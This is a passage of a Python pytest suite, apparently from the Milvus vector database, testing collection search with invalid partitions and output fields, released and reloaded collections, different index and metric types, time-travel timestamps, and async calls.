check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_invalid_type(self, get_invalid_partition):
"""
target: test search invalid partition
method: search with invalid partition type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search the invalid partition
partition_name = get_invalid_partition
err_msg = "`partition_name_array` value {} is illegal".format(partition_name)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, partition_name,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_invalid_type(self, get_invalid_output_fields):
"""
target: test search with output fields
method: search with invalid output_field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search
log.info("test_search_with_output_fields_invalid_type: Searching collection %s" % collection_w.name)
output_fields = get_invalid_output_fields
err_msg = "`output_fields` value {} is illegal".format(output_fields)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
        target: test searching a released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
        # 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L2)
def test_search_release_partition(self):
"""
        target: test searching a collection with a released partition
method: 1. create collection
2. release partition
3. search with specifying the released partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
        target: test search with empty collection
method: 1. search the empty collection before load
2. search the empty collection after load
3. search collection with data inserted but not load again
expected: 1. raise exception if not loaded
2. return topk=0 if loaded
3. return topk successfully
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
# 4. search with data inserted but not load again
data = cf.gen_default_dataframe_data(nb=2000)
insert_res, _ = collection_w.insert(data)
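        # short wait so the freshly inserted data becomes visible to search
        # (assumes the usual graceful-time delay between insert and searchability)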
sleep(1)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_res.primary_keys,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
        method: 1. create a collection with partitions
                2. delete a partition
                3. search the deleted partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6731")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_different_index_invalid_params(self, index, params):
"""
        target: test search after building different indexes with invalid params
        method: create index with invalid params and search
        expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
is_index=True)[0:4]
# 2. create different index
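        # for PQ-based indexes the build param m is assumed to be required to
        # divide the vector dimension evenly, hence the adjustment below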
if params.get("m"):
if (default_dim % params["m"]) != 0:
params["m"] = default_dim // 4
log.info("test_search_different_index_invalid_params: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_different_index_invalid_params: Created index-%s" % index)
collection_w.load()
# 3. search
log.info("test_search_different_index_invalid_params: Searching after creating index-%s" % index)
collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
target: test search not existed partition
method: search with not existed partition
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non_exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
        target: test search on binary data with an invalid metric type
method: search with wrong metric type
expected: raise exception and report the error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self):
"""
        target: search binary collection using FLAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(2, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: raise exception
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)[0:4]
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: 'Field int63 not exist'})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("output_fields", [[default_search_field], ["%"]])
def test_search_output_field_vector(self, output_fields):
"""
target: test search with vector as output field
method: search with one vector output_field or
wildcard for vector
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*%"], ["**"], ["*", "@"]])
def test_search_output_field_invalid_wildcard(self, output_fields):
"""
target: test search with invalid output wildcard
method: search with invalid output_field wildcard
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"Field {output_fields[-1]} not exist"})
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function",
params=[default_nb, default_nb_medium])
def nb(self, request):
yield request.param
@pytest.fixture(scope="function", params=[2, 500])
def nq(self, request):
yield request.param
@pytest.fixture(scope="function", params=[8, 128])
def dim(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def auto_id(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self, nq, dim, auto_id):
"""
target: test search normal case
method: create connection, collection, insert and search
        expected: 1. search returns 0 results with a travel timestamp before insertion
                  2. search successfully with limit(topK) at the insertion travel timestamp
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:5]
# 2. search before insert time_stamp
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
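        # a travel timestamp earlier than the insert timestamp should see none of
        # the inserted entities; searching at the insert timestamp should see all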
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp-1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0})
# 3. search after insert time_stamp
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
    @pytest.mark.tags(CaseLabel.L0)
def test_search_with_hit_vectors(self, nq, dim, auto_id):
"""
target: test search with vectors in collections
        method: create connection and collection, insert data and search with the inserted vectors
        expected: search successfully with limit(topK); each query hits itself at top 1 (min distance is 0)
"""
collection_w, _vectors, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# get vectors that inserted into collection
vectors = np.array(_vectors[0]).tolist()
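        # the last column of each inserted row is assumed to be the float vector
        # field, so [-1] extracts the raw vectors to reuse as query vectors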
vectors = [vectors[i][-1] for i in range(nq)]
log.info("test_search_with_hit_vectors: searching collection %s" % collection_w.name)
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
log.info("test_search_with_hit_vectors: checking the distance of top 1")
for hits in search_res:
            # verify that the top-1 hit is the query vector itself, so the min distance is 0
assert hits.distances[0] == 0.0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self, dim, auto_id, _async):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
        # 1. initialize with data
collection_w = self.init_collection_general(prefix, True,
auto_id=auto_id, dim=dim)[0]
        # 2. search with an empty list of query vectors
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("search_params", [{}, {"params": {}}, {"params": {"nprobe": 10}}])
def test_search_normal_default_params(self, dim, auto_id, search_params, _async):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=0,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self, nq, dim, auto_id, _async):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
        # 2. search all the partitions before releasing one partition
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_one: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release all partitions
3. search the collection
expected: 0 entity should be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:4]
        # 2. search all the partitions before releasing them
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
        target: search a collection after it is released and loaded again
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
        # 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_collection_after_release_load: releasing collection %s" % collection_w.name)
collection_w.release()
log.info("test_search_collection_after_release_load: released collection %s" % collection_w.name)
# 3. Search the pre-released collection after load
log.info("test_search_collection_after_release_load: loading collection %s" % collection_w.name)
collection_w.load()
log.info("test_search_collection_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6997")
def test_search_partition_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
        target: search a collection after one of its partitions is released and loaded again
method: 1. create collection
2. release a partition
3. load partition
4. search the pre-released partition
expected: search successfully
"""
        # 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
        # 2. release a partition
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 4. Search the pre-released partition after load
        limit_check = min(limit, par[1].num_entities)
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self, nb, nq, dim, auto_id, _async):
"""
        target: test search when load happens before flush
        method: 1. create collection and insert data
                2. load the collection
                3. flush, then load again
                4. search the collection
expected: search success with limit(topK)
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, auto_id=auto_id, dim=dim)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, nb, auto_id=auto_id, dim=dim)[3]
# 3. load data
collection_w.load()
# 4. flush and load
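        # reading num_entities is assumed to trigger a flush in pymilvus, sealing
        # the inserted data before the collection is loaded again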
collection_w.num_entities
collection_w.load()
        # 5. search the inserted data
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_new_data(self, nq, dim, auto_id, _async):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
expected: new data should be searched
"""
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb_old,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search for original data after load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp+1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old,
"_async": _async})
# 3. insert new data
nb_new = 300
_, _, _, insert_ids_new, time_stamp = cf.insert_data(collection_w, nb_new,
auto_id=auto_id, dim=dim,
insert_offset=nb_old)
insert_ids.extend(insert_ids_new)
        # gracefulTime defaults to 1s; newly inserted data may not be
        # searchable until gracefulTime has elapsed, so wait it out
time.sleep(gracefulTime)
# 4. search for new data without load
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old + nb_new,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_max_dim(self, auto_id, _async):
"""
target: test search with max configuration
method: create connection, collection, insert and search with max dim
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 100,
auto_id=auto_id,
dim=max_dim)[0:4]
# 2. search
nq = 2
log.info("test_search_max_dim: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(max_dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, nq,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nq,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index_with_params(self, dim, index, params, auto_id, _async):
"""
target: test search after different index
method: test search after different index and corresponding search params
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create index and load
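        # PQ-related build params (m, PQM) are assumed to need to divide the
        # dimension evenly, so they are adjusted before creating the index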
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, dim, index, params, auto_id, _async):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
log.info("test_search_after_index_different_metric_type: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_index_different_metric_type: Created index-%s" % index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index, "IP")
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_multiple_times(self, nb, nq, dim, auto_id, _async):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search for multiple times
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i + 1))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_sync_async_multiple_times(self, nb, nq, dim, auto_id):
"""
target: test async search after sync search case
method: create connection, collection, insert,
sync search and async search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search
log.info("test_search_sync_async_multiple_times: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_sync_async_multiple_times: searching round %d" % (i + 1))
for _async in [False, True]:
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_multiple_vectors(self, nb, nq, dim, auto_id, _async):
"""
target: test search with multiple vectors
method: create connection, collection with multiple
vectors, insert and search
expected: search successfully with limit(topK)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=dim), cf.gen_float_vec_field(name="tmp", dim=dim)]
schema = cf.gen_collection_schema(fields=fields, auto_id=auto_id)
collection_w = self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={"name": c_name, "schema": schema})[0]
# 3. insert
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors_tmp = [[random.random() for _ in range(dim)] for _ in range(nb)]
data = [[i for i in range(nb)], [np.float32(i) for i in range(nb)], vectors, vectors_tmp]
if auto_id:
data = [[np.float32(i) for i in range(nb)], vectors, vectors_tmp]
res = collection_w.insert(data)
insert_ids = res.primary_keys
assert collection_w.num_entities == nb
# 4. load
collection_w.load()
# 5. search all the vectors
log.info("test_search_multiple_vectors: searching collection %s" % collection_w.name)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
collection_w.search(vectors[:nq], "tmp",
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self, nb, auto_id, _async):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
        limit_check = min(limit, par[1].num_entities)
search_params = {"metric_type": "L2", "params": {"nprobe": 128}}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, nb, nq, dim, auto_id, _async):
"""
target: test search from partitions
method: search from partitions
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
